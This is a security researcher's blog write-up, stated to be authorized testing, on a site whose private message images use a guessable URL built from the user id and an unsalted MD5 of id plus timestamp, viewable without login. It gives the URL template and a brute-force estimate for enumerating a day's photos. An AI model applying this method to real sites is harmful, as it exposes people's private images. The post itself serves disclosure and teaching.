Information disclosure and why understanding the logic is crucial
All the actions described in the article were performed with the permission of the site owner as the part of vulnerability tests.
In the previous blog post I covered the findings related to temporary file upload, but let’s further and check if we can do something with the final file sent to another user.
After the temporary file was uploaded and the message was sent this file will be moved to a different directory and renamed, so seems that we’ll be not able to make an XSS work, it also has a predefined extension, so we can not exploit the file itself.
Here is how the link to the final file looks like:https://[redacted].com/g/6/182/362/6182362_1f4c9771ba02656fd14994420a522ff3_200.JPG
Getting back to basics
While ago I was writing the web crawlers like.. a lot. And one of the biggest things for me was getting into the logic of the path generation. It allows us to create shortcuts and generate the valid links we need with no additional requests to the site, which means the lower load for the site and less time to crawl everything.
Let’s try to understand how the link above was generated My account’s id is 6182362 and we clearly can see it in two places of the link, let’s make a template:
https://[redacted].com/g/{id[:1]}/{id[1:4]}/{id[4:]}/{id}_{hash}_200.JPG
Crack the hash!
What do we also have here? Let’s check the page source code
- div id which looks like a timestamp
- data-id which is some additional id (some internal message id?)
- width, height of the full image, and 600 as a number in the end of the link to it
The hash itself looks like MD5.
Now it’s time to combine everything. I’ve created a custom wordlist that contains all the parameters I was able to find in connection with my account and the message:
- message timestamp
- account’s id
- some hashes from the cookies
- data-id
- all the parts of my id from the link
- height and width
- some divider characters like “_” and “|” that can be used during the hashing
And combined all of them up to 5 times using the custom Python script. Now I have the wordlist with every possible combination of these parameters with the chain length up to 5, the final count of the combinations I’ve got is a bit more than 1 mln.
It’s time to md5 every of it and compares it with the hash I have, if we’ll be lucky enough we’ll get the params used.
Nice, it’s just a id (6182362) and the message timestamp (1623277252)
The final generation rule is https://[redacted].com/g/{id[:1]}/{id[1:4]}/{id[4:]}/{id}_{md5(id+timestamp)}_200.JPG
What's next?
We miss only one piece to get the impact. Let’s try to log out and open the link to the photo we’ve sent.
Let’s summarise:
The only two parameters we need to get the valid link to the image uploaded by the user are
- user id
- timestamp
We don't need to be logged in to view any photos sent by users, we just need to get a valid link to do it. ID can be found directly in the user’s profile. For the timestamp… Thankfully timestamp ends with the seconds.
We need to make 246060=86400 requests to get all possible links that will contain the valid links to all photos sent to all users within this day. Not a big deal if you want to compromise someone, it’s only 2.4h per day to check everything with 10req. per second.
Thank you for reading and keep your hashes salted and access restricted properly :)